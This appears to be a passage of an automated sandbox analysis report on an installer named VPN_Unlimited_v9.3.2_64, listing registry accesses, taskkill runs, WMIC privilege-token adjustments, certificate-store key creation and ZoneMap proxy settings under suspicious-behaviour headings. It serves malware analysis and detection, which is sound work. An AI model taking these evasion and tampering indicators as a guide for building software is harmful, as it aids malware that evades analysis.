| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\more.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\VPN_Unlimited_v9.3.2_64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{EFD9F19E-3118-4812-952D-3DDA554BA588}\.be\VC_redist.x64.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e6cf55ff94a5976e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e6cf55ff0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e6cf55ff000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de6cf55ff000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e6cf55ff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\dialer.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\URL Protocol | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command\ = "\"C:\\Program Files (x86)\\VPN Unlimited\\vpn-unlimited-launcher.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\vpnunlimited\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-P6PGS.tmp\VPN_Unlimited_v9.3.2_64.tmp | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\wbem\WMIC.exe | N/A |
